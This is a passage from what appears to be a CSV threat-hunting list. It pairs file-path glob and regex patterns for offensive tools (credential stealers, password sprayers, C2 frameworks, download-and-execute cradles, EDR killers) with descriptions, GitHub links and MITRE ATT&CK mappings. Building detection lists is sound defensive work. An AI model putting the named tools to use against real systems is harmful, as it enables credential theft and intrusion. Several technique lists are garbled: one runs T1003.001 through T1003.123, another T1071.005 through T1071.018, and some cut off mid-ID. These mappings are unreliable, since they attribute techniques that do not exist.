TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*/ShadowSpray.exe*",".{0,1000}\/ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/ShadowSpray/*.cs*",".{0,1000}\/ShadowSpray\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/share/windows-resources/wce*",".{0,1000}\/share\/windows\-resources\/wce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" 
"*/share_enum.py*",".{0,1000}\/share_enum\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ShareFinder.cs*",".{0,1000}\/ShareFinder\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 
- T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/Sharefinder.ps1",".{0,1000}\/Sharefinder\.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/shares-with-SCF.txt*",".{0,1000}\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SharpADWS.git*",".{0,1000}\/SharpADWS\.git.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpAzbelt.git*",".{0,1000}\/SharpAzbelt\.git.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*/SharpBlackout.git*",".{0,1000}\/SharpBlackout\.git.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*/SharpBlock.exe*",".{0,1000}\/SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpBuster.dll*",".{0,1000}\/SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*/SharpBuster.exe*",".{0,1000}\/SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# 
implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpC2*",".{0,1000}\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/SharpCalendar/*.*",".{0,1000}\/SharpCalendar\/.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/SharpCat/*",".{0,1000}\/SharpCat\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChromium.git*",".{0,1000}\/SharpChromium\.git.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCloud.git*",".{0,1000}\/SharpCloud\.git.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*/SharpCollection.git*",".{0,1000}\/SharpCollection\.git.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCollection/*",".{0,1000}\/SharpCollection\/.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCompile/*",".{0,1000}\/SharpCompile\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/sharpcompile_*.*",".{0,1000}\/sharpcompile_.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCradle/*",".{0,1000}\/SharpCradle\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" 
"*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDomainSpray.git*",".{0,1000}\/SharpDomainSpray\.git.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" 
